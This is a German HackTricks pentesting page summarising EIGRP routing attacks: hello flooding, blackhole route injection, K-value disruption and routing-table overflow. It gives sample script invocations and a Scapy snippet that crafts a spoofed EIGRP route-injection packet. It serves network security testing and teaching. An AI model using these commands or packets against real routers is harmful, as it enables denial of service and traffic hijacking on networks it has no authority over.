EIGRP Angriffe
Tip
Lernen & üben Sie AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Lernen & üben Sie Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.
Dies ist eine Zusammenfassung der in https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 vorgestellten Angriffe. Siehe den Artikel für weitere Informationen.
Fake EIGRP Neighbors Attack
- Ziel: Router-CPUs durch das Fluten mit EIGRP hello packets überlasten, was möglicherweise zu einem Denial of Service (DoS) führt.
- Tool: helloflooding.py script.
- Ausführung:
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
- Parameter:
--interface: Gibt die Netzwerk-Schnittstelle an, z. B.eth0.--as: Definiert die EIGRP autonomous system Nummer, z. B.1.--subnet: Setzt das Subnetz, z. B.10.10.100.0/24.
EIGRP Blackhole Attack
- Ziel: Den Netzwerkverkehr stören, indem eine falsche Route injiziert wird, was zu einem Blackhole führt, in das Traffic an ein nicht existierendes Ziel geleitet wird.
- Tool: routeinject.py script.
- Ausführung:
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
- Parameter:
--interface: Gibt die Schnittstelle des Angreifers an.--as: Definiert die EIGRP AS-Nummer.--src: Setzt die IP-Adresse des Angreifers.--dst: Setzt die Ziel-Subnetz-IP.--prefix: Definiert die Maske der Ziel-Subnetz-IP.
Abusing K-Values Attack
- Ziel: Kontinuierliche Störungen und Wiederverbindungen innerhalb der EIGRP-Domain erzeugen, indem veränderte K-values injiziert werden, was effektiv zu einem DoS führt.
- Tool: relationshipnightmare.py script.
- Ausführung:
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
- Parameter:
--interface: Gibt die Netzwerk-Schnittstelle an.--as: Definiert die EIGRP AS-Nummer.--src: Setzt die IP-Adresse eines legitimen Routers.
Routing Table Overflow Attack
- Ziel: Die CPU und RAM des Routers belasten, indem die Routing-Tabelle mit zahlreichen falschen Routen geflutet wird.
- Tool: routingtableoverflow.py script.
- Ausführung:
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
- Parameter:
--interface: Gibt die Netzwerk-Schnittstelle an.--as: Definiert die EIGRP AS-Nummer.--src: Setzt die IP-Adresse des Angreifers.
Protokollhinweise (nützlich für Angriffe)
- HELLO packets carry K-values and neighbors only form when they match. Das ist die Grundlage für K-value mismatch/relationship disruption attacks und erklärt, warum mismatched K-values Adjazenz verhindern.
- The PARAMETER TLV (Type 0x0001) in HELLO (and initial UPDATE) carries K-values and Hold Time, daher geben passive Captures die genauen Werte frei, die auf dem Segment verwendet werden.
Scapy Packet Crafting (Route Injection / Fake Neighbors)
Scapy liefert eine EIGRP contrib layer mit TLVs wie EIGRPParam und EIGRPIntRoute, was ausreicht, um UPDATEs für route injection zu erstellen. Beispiel adaptiert aus dem davidbombal/scapy EIGRP route injection script:
from scapy.all import *
load_contrib("eigrp")
sendp(Ether()/IP(src="192.168.1.248", dst="224.0.0.10") /
EIGRP(opcode="Update", asn=100, seq=0, ack=0,
tlvlist=[EIGRPIntRoute(dst="192.168.100.0",
nexthop="192.168.1.248")]))
Dasselbe Repo enthält schnelle “fake neighbor”-Skripte, die ein echtes EIGRP-Paket sniffen und es mit einer spoofed source IP erneut abspielen, um phantom neighbors zu erzeugen (nützlich für CPU/neighbor-table pressure).
- Scapy EIGRP contrib-Dokumentation: https://scapy.readthedocs.io/en/latest/api/scapy.contrib.eigrp.html
- Example scripts: https://github.com/davidbombal/scapy
Routopsy & NSE-Helfer
- Routopsy erstellt ein Virtual-Router-Angriffslabor (FRRouting + Scapy) und enthält DRP-Angriffe, die du für EIGRP-Tests anpassen kannst. https://sensepost.com/blog/2020/routopsy-hacking-routing-with-routers/
- Nmap’s NSE enthält eine kleine
eigrp-Bibliothek zum Parsen/Generieren einer Teilmenge von EIGRP-Paketen. https://nmap.org/nsedoc/lib/eigrp.html
Authentication Recon
- Der EIGRP named mode unterstützt HMAC-SHA-256 authentication über
authentication mode hmac-sha-256 .... Wenn aktiviert, müssen erstellte Pakete mit dem korrekten Schlüssel authentifiziert werden; wenn nicht aktiviert, ist spoofing/injection einfacher durchzuführen.
References
- https://www.rfc-editor.org/rfc/rfc7868.html
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/iproute_eigrp/configuration/15-mt/ire-15-mt-book/ire-sha-256.html
Tip
Lernen & üben Sie AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Lernen & üben Sie Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.


